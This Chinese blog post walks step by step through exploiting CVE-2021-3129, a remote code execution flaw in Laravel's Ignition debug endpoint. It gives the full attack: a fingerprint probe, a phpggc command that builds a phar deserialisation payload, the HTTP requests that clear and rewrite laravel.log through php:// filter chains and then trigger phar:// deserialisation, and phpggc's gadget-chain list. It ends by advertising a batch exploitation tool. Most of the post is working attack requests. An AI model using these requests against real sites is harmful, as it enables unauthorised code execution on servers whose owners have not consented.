Laravel RCE 另类技巧

2022-06-05 09:58:10 浏览数 (1)

Laravel框架简介

Laravel是一套简洁、优雅的PHP Web开发框架(PHP Web Framework)

它可以让你从面条一样杂乱的代码中解脱出来;它可以帮你构建一个完美的网络APP,而且每行代码都可以简洁、富于表达力

在Laravel中已经具有了一套高级的PHP ActiveRecord实现 – Eloquent ORM

它能方便的将“约束(constraints)”应用到关系的双方,这样你就具有了对数据的完全控制,而且享受到ActiveRecord的所有便利

Eloquent原生支持Fluent中查询构造器(query-builder)的所有方法

复现过程

通过指纹识别判断出框架信息和版本

代码语言:javascript复制
https://小生观察室/_ignition/execute-solution

路径信息

网站开启Debug调试功能,且Laravel<=8.4.2,疑似存在CVE-2021-3129RCE漏洞

数据包验证

Request:

代码语言:javascript复制
POST /_ignition/execute-solution HTTP/2
Host: 小生观察室
Content-Type: application/json
Content-Length: 170

{
  "solution": "Facade\Ignition\Solutions\MakeViewVariableOptionalSolution",
  "parameters": {
    "variableName": "username",
    "viewFile": "xxxxxxx"
  }
}

如果出现500状态码界面就基本存在漏洞

Phar反序列化

要成功利用需要用到phpggc环境

复现环境PHP版本为:PHP 7.2.24-0ubuntu0.18.04.11

代码语言:javascript复制
git clone https://github.com/ambionics/phpggc.git
chmod 777 phpggc

利用phpggc生成phar序列化利用POC

代码语言:javascript复制
php -d "phar.readonly=0" ./phpggc Laravel/RCE5 "phpinfo();" --phar phar -o php://output | base64 -w 0 | python -c "import sys;print(''.join(['='   hex(ord(i))[2:]   '=00' for i in sys.stdin.read()]).upper())"

得到的POC在最后面需再加一个a,否则最终laravel.log里面将生成两个POC,导致利用失败

测试过程

将原日志文件laravel.log清空

代码语言:javascript复制
POST /_ignition/execute-solution HTTP/2
Host: 小生观察室
Content-Type: application/json
Content-Length: 332

{
  "solution": "Facade\Ignition\Solutions\MakeViewVariableOptionalSolution",
  "parameters": {
    "variableName": "username",
    "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"
  }
}

给Log增加一次前缀,用于对齐:

代码语言:javascript复制
POST /_ignition/execute-solution HTTP/2
Host: 小生观察室
Content-Type: application/json
Content-Length: 155

{
 "solution": "Facade\Ignition\Solutions\MakeViewVariableOptionalSolution",
 "parameters": {
  "variableName":"username",
"viewFile": "AA"
 }
}

将POC作为viewFile的值

代码语言:javascript复制
POST /_ignition/execute-solution HTTP/2
Host: 小生观察室
Content-Type: application/json
Content-Length: 5050


{
 "solution": "Facade\Ignition\Solutions\MakeViewVariableOptionalSolution",
 "parameters": {
  "variableName":"username",
"viewFile": "=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=72=00=2B=00=41=00=51=00=41=00=41=00=41=00=51=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=44=00=49=00=41=00=51=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=6A=00=55=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=51=00=6E=00=56=00=7A=00=58=00=45=00=52=00=70=00=63=00=33=00=42=00=68=00=64=00=47=00=4E=00=6F=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=59=00=36=00=49=00=67=00=41=00=71=00=41=00=48=00=46=00=31=00=5A=00=58=00=56=00=6C=00=55=00=6D=00=56=00=7A=00=62=00=32=00=78=00=32=00=5A=00=58=00=49=00=69=00=4F=00=32=00=45=00=36=00=4D=00=6A=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=30=00=38=00=36=00=4D=00=6A=00=55=00=36=00=49=00=6B=00=31=00=76=00=59=00=32=00=74=00=6C=00=63=00=6E=00=6C=00=63=00=54=00=47=00=39=00=68=00=5A=00=47=00=56=00=79=00=58=00=45=00=56=00=32=00=59=00=57=00=78=00=4D=00=62=00=32=00=46=00=6B=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=41=00=36=00=65=00=33=00=31=00=70=00=4F=00=6A=00=45=00=37=00=63=00=7A=00=6F=00=30=00=4F=00=69=00=4A=00=73=00=62=00=32=00=46=00=6B=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=67=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=51=00=6E=00=4A=00=76=00=59=00=57=00=52=00=6A=00=59=00=58=00=4E=00=30=00=61=00=57=00=35=00=6E=00=58=00=45=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=45=00=56=00=32=00=5A=00=57=00=35=00=30=00=49=00=6A=00=6F=00=78=00=4F=00=6E=00=74=00=7A=00=4F=00=6A=00=45=00=77=00=4F=00=69=00=4A=00=6A=00=62=00=32=00=35=00=75=00=5A=00=57=00=4E=00=30=00=61=00=57=00=39=00=75=00=49=00=6A=00=74=00=50=00=4F=00=6A=00=4D=00=79=00=4F=00=69=00=4A=00=4E=00=62=00=32=00=4E=00=72=00=5A=00=58=00=4A=00=35=00=58=00=45=00=64=00=6C=00=62=00=6D=00=56=00=79=00=59=00=58=00=52=00=76=00=63=00=6C=00=78=00=4E=00=62=00=32=00=4E=00=72=00=52=00=47=00=56=00=6D=00=61=00=57=00=35=00=70=00=64=00=47=00=6C=00=76=00=62=00=69=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6A=00=62=00=32=00=35=00=6D=00=61=00=57=00=63=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=55=00=36=00=49=00=6B=00=31=00=76=00=59=00=32=00=74=00=6C=00=63=00=6E=00=6C=00=63=00=52=00=32=00=56=00=75=00=5A=00=58=00=4A=00=68=00=64=00=47=00=39=00=79=00=58=00=45=00=31=00=76=00=59=00=32=00=74=00=44=00=62=00=32=00=35=00=6D=00=61=00=57=00=64=00=31=00=63=00=6D=00=46=00=30=00=61=00=57=00=39=00=75=00=49=00=6A=00=6F=00=78=00=4F=00=6E=00=74=00=7A=00=4F=00=6A=00=63=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=35=00=68=00=62=00=57=00=55=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=59=00=57=00=4A=00=6A=00=5A=00=47=00=56=00=6D=00=5A=00=79=00=49=00=37=00=66=00=58=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=32=00=39=00=6B=00=5A=00=53=00=49=00=37=00=63=00=7A=00=6F=00=79=00=4E=00=54=00=6F=00=69=00=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=63=00=47=00=68=00=77=00=61=00=57=00=35=00=6D=00=62=00=79=00=67=00=70=00=4F=00=79=00=42=00=6C=00=65=00=47=00=6C=00=30=00=4F=00=79=00=41=00=2F=00=50=00=69=00=49=00=37=00=66=00=58=00=31=00=39=00=43=00=41=00=41=00=41=00=41=00=48=00=52=00=6C=00=63=00=33=00=51=00=75=00=64=00=48=00=68=00=30=00=42=00=41=00=41=00=41=00=41=00=4F=00=50=00=30=00=69=00=57=00=49=00=45=00=41=00=41=00=41=00=41=00=44=00=48=00=35=00=2F=00=32=00=4B=00=51=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=44=00=55=00=46=00=73=00=76=00=36=00=70=00=76=00=78=00=48=00=44=00=54=00=47=00=48=00=42=00=49=00=79=00=37=00=4F=00=41=00=32=00=36=00=41=00=45=00=70=00=48=00=54=00=41=00=67=00=41=00=41=00=41=00=45=00=64=00=43=00=54=00=55=00=49=00=3D=00a"
 }
}

清空对log文件中的干扰字符,只留下POC

代码语言:javascript复制
POST /_ignition/execute-solution HTTP/2
Host: 小生观察室
Content-Type: application/json
Content-Length: 290

{
 "solution": "Facade\Ignition\Solutions\MakeViewVariableOptionalSolution",
 "parameters": {
 "variableName": "username",
"viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"
 }
 }

使用phar://进行反序列化,执行任意代码

(此时需要使用绝对路径)

代码语言:javascript复制
POST /_ignition/execute-solution HTTP/2
Host: 小生观察室
Content-Type: application/json
Content-Length: 212

{
  "solution": "Facade\Ignition\Solutions\MakeViewVariableOptionalSolution",
  "parameters": {
    "variableName": "username",
    "viewFile": "phar:///var/www/storage/logs/laravel.log/test.txt"
  }
}

但执行到这一步时,出现错误,推测gadget利用链存在问题

查看phpgc通用gadget

代码语言:javascript复制
root@小生观察室:/var/local/phpggc# ./phpggc -l

Gadget Chains
-------------

NAME                                      VERSION                            TYPE                   VECTOR         I
CakePHP/RCE1                              ? <= 3.9.6                         RCE (Command)          __destruct
CakePHP/RCE2                              ? <= 4.2.3                         RCE (Function call)    __destruct
CodeIgniter4/RCE1                         4.0.0-beta.1 <= 4.0.0-rc.4         RCE (Function call)    __destruct
CodeIgniter4/RCE2                         4.0.0-rc.4 <= 4.0.4                RCE (Function call)    __destruct
CodeIgniter4/RCE3                         -4.1.3                             RCE (Function call)    __destruct
Doctrine/FW1                              ?                                  File write             __toString     *
Doctrine/FW2                              2.3.0 <= 2.4.0 v2.5.0 <= 2.8.5     File write             __destruct     *
Dompdf/FD1                                1.1.1 <= ?                         File delete            __destruct     *
Dompdf/FD2                                ? < 1.1.1                          File delete            __destruct     *
Drupal7/FD1                               7.0 < ?                            File delete            __destruct     *
Drupal7/RCE1                              7.0.8 < ?                          RCE (Function call)    __destruct     *
Guzzle/FW1                                6.0.0 <= 6.3.3                     File write             __destruct
Guzzle/INFO1                              6.0.0 <= 6.3.2                     phpinfo()              __destruct     *
Guzzle/RCE1                               6.0.0 <= 6.3.2                     RCE (Function call)    __destruct     *
Horde/RCE1                                <= 5.2.22                          RCE (PHP code)         __destruct     *
Kohana/FR1                                3.*                                File read              __toString     *
Laminas/FD1                               <= 2.11.2                          File delete            __destruct
Laminas/FW1                               2.8.0 <= 3.0.x-dev                 File write             __destruct     *
Laravel/RCE1                              5.4.27                             RCE (Function call)    __destruct
Laravel/RCE2                              5.4.0 <= 8.6.9                     RCE (Function call)    __destruct
Laravel/RCE3                              5.5.0 <= 5.8.35                    RCE (Function call)    __destruct     *
Laravel/RCE4                              5.4.0 <= 8.6.9                     RCE (Function call)    __destruct
Laravel/RCE5                              5.8.30                             RCE (PHP code)         __destruct     *
Laravel/RCE6                              5.5.* <= 5.8.35                    RCE (PHP code)         __destruct     *
Laravel/RCE7                              ? <= 8.16.1                        RCE (Function call)    __destruct     *
Laravel/RCE8                              7.0.0 <= 8.6.9                     RCE (Function call)    __destruct     *
Magento/FW1                               ? <= 1.9.4.0                       File write             __destruct     *
Magento/SQLI1                             ? <= 1.9.4.0                       SQL injection          __destruct
Magento2/FD1                              *                                  File delete            __destruct     *
Monolog/RCE1                              1.4.1 <= 1.6.0 1.17.2 <= 2.2.0     RCE (Function call)    __destruct
Monolog/RCE2                              1.4.1 <= 2.2.0                     RCE (Function call)    __destruct
Monolog/RCE3                              1.1.0 <= 1.10.0                    RCE (Function call)    __destruct
Monolog/RCE4                              ? <= 2.4.4                         RCE (Command)          __destruct     *
Monolog/RCE5                              1.25 <= 2.2.0                      RCE (Function call)    __destruct
Monolog/RCE6                              1.10.0 <= 2.2.0                    RCE (Function call)    __destruct
Monolog/RCE7                              1.10.0 <= 2.2.0                    RCE (Function call)    __destruct     *
Phalcon/RCE1                              <= 1.2.2                           RCE                    __wakeup       *
PHPCSFixer/FD1                            <= 2.17.3                          File delete            __destruct
PHPCSFixer/FD2                            <= 2.17.3                          File delete            __destruct
PHPExcel/FD1                              1.8.2                              File delete            __destruct
PHPExcel/FD2                              <= 1.8.1                           File delete            __destruct
PHPExcel/FD3                              1.8.2                              File delete            __destruct
PHPExcel/FD4                              <= 1.8.1                           File delete            __destruct
PHPSecLib/RCE1                            2.0.0 <= 2.0.34                    RCE (PHP code)         __destruct     *
Pydio/Guzzle/RCE1                         < 8.2.2                            RCE (Function call)    __toString
Slim/RCE1                                 3.8.1                              RCE (Function call)    __toString
Smarty/FD1                                ?                                  File delete            __destruct
Smarty/SSRF1                              ?                                  SSRF                   __destruct     *
SwiftMailer/FD1                           -5.4.12 , -6.2.1                   File delete            __destruct
SwiftMailer/FW1                           5.1.0 <= 5.4.8                     File write             __toString
SwiftMailer/FW2                           6.0.0 <= 6.0.1                     File write             __toString
SwiftMailer/FW3                           5.0.1                              File write             __toString
SwiftMailer/FW4                           4.0.0 <= ?                         File write             __destruct
Symfony/FW1                               2.5.2                              File write             DebugImport    *
Symfony/FW2                               3.4                                File write             __destruct
Symfony/RCE1                              3.3                                RCE (Command)          __destruct     *
Symfony/RCE2                              2.3.42 < 2.6                       RCE (PHP code)         __destruct     *
Symfony/RCE3                              2.6 <= 2.8.32                      RCE (PHP code)         __destruct     *
Symfony/RCE4                              3.4.0-34, 4.2.0-11, 4.3.0-7        RCE (Function call)    __destruct     *
Symfony/RCE5                              5.2.*                              RCE (Function call)    __destruct
TCPDF/FD1                                 <= 6.3.5                           File delete            __destruct     *
ThinkPHP/FW1                              5.0.4-5.0.24                       File write             __destruct     *
ThinkPHP/FW2                              5.0.0-5.0.03                       File write             __destruct     *
ThinkPHP/RCE1                             5.1.x-5.2.x                        RCE (Function call)    __destruct     *
ThinkPHP/RCE2                             5.0.24                             RCE (Function call)    __destruct     *
Typo3/FD1                                 4.5.35 <= 10.4.1                   File delete            __destruct     *
WordPress/Dompdf/RCE1                     0.8.5  & WP < 5.5.2                RCE (Function call)    __destruct     *
WordPress/Dompdf/RCE2                     0.7.0 <= 0.8.4 & WP < 5.5.2        RCE (Function call)    __destruct     *
WordPress/Guzzle/RCE1                     4.0.0 <= 6.4.1  & WP < 5.5.2       RCE (Function call)    __toString     *
WordPress/Guzzle/RCE2                     4.0.0 <= 6.4.1  & WP < 5.5.2       RCE (Function call)    __destruct     *
WordPress/P/EmailSubscribers/RCE1         4.0 <= 4.4.7  & WP < 5.5.2         RCE (Function call)    __destruct     *
WordPress/P/EverestForms/RCE1             1.0 <= 1.6.7  & WP < 5.5.2         RCE (Function call)    __destruct     *
WordPress/P/WooCommerce/RCE1              3.4.0 <= 4.1.0  & WP < 5.5.2       RCE (Function call)    __destruct     *
WordPress/P/WooCommerce/RCE2              <= 3.4.0 & WP < 5.5.2              RCE (Function call)    __destruct     *
WordPress/P/YetAnotherStarsRating/RCE1    ? <= 1.8.6 & WP < 5.5.2            RCE (Function call)    __destruct     *
WordPress/PHPExcel/RCE1                   1.8.2  & WP < 5.5.2                RCE (Function call)    __toString     *
WordPress/PHPExcel/RCE2                   <= 1.8.1 & WP < 5.5.2              RCE (Function call)    __toString     *
WordPress/PHPExcel/RCE3                   1.8.2  & WP < 5.5.2                RCE (Function call)    __destruct     *
WordPress/PHPExcel/RCE4                   <= 1.8.1 & WP < 5.5.2              RCE (Function call)    __destruct     *
WordPress/PHPExcel/RCE5                   1.8.2  & WP < 5.5.2                RCE (Function call)    __destruct     *
WordPress/PHPExcel/RCE6                   <= 1.8.1 & WP < 5.5.2              RCE (Function call)    __destruct     *
Yii/RCE1                                  1.1.20                             RCE (Function call)    __wakeup       *
Yii2/RCE1                                 <2.0.38                            RCE (Function call)    __destruct     *
Yii2/RCE2                                 <2.0.38                            RCE (PHP code)         __destruct     *
ZendFramework/FD1                         ? <= 1.12.20                       File delete            __destruct
ZendFramework/RCE1                        ? <= 1.12.20                       RCE (PHP code)         __destruct     *
ZendFramework/RCE2                        1.11.12 <= 1.12.20                 RCE (Function call)    __toString     *
ZendFramework/RCE3                        2.0.1 <= ?                         RCE (Function call)    __destruct
ZendFramework/RCE4                        ? <= 1.12.20                       RCE (PHP code)         __destruct     *

批量遍历并执行命令

编写脚本对RCE利用链进行批量遍历并执行命令结果进输出

公众号回复Laravel批量即可下载Laravel批量漏洞利用工具

0 人点赞